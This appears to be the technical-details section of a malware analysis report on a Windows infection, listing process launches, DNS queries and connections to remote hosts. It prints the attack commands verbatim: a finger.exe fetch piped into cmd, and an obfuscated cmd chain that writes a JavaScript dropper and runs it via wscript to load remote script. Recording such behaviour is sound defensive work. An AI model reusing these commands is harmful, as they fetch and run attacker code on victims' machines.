Technical Information
- '<SYSTEM32>\finger.exe' ok@staafl.vneiufybu.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\bvZ.js"
- C:\users\public\bvz.js
- 'st####.vneiufybu.xyz':79
- 'dh#####uu6h.delira.buzz':80
- 'st####.vneiufybu.xyz':79
- DNS ASK st####.vneiufybu.xyz
- DNS ASK dh#####uu6h.delira.buzz
- '<SYSTEM32>\cmd.exe' /c finger ok@staafl.vneiufybu.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt UNRU=.j&&SEt MGJJI=vYEZcarYEZc a =YEZc 'scYEZcriYEZcptYEZc:'; b =YEZc 'hYEZcTtPYEZc:'; GYEZcetYEZcObjYEZcecYEZct(YEZca+b+'&&sET PBMM=SLGABSLGABdhey8uauu6h.delira.buzzSLGAB?1SLGAB')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p XGF3F="%MGJJI:YEZc=%%PBMM:SLGAB=/%" 0<nul 1>C:\Users\Public\bvZ%UNRU%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\bvZ%UNRU%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\bvZ.js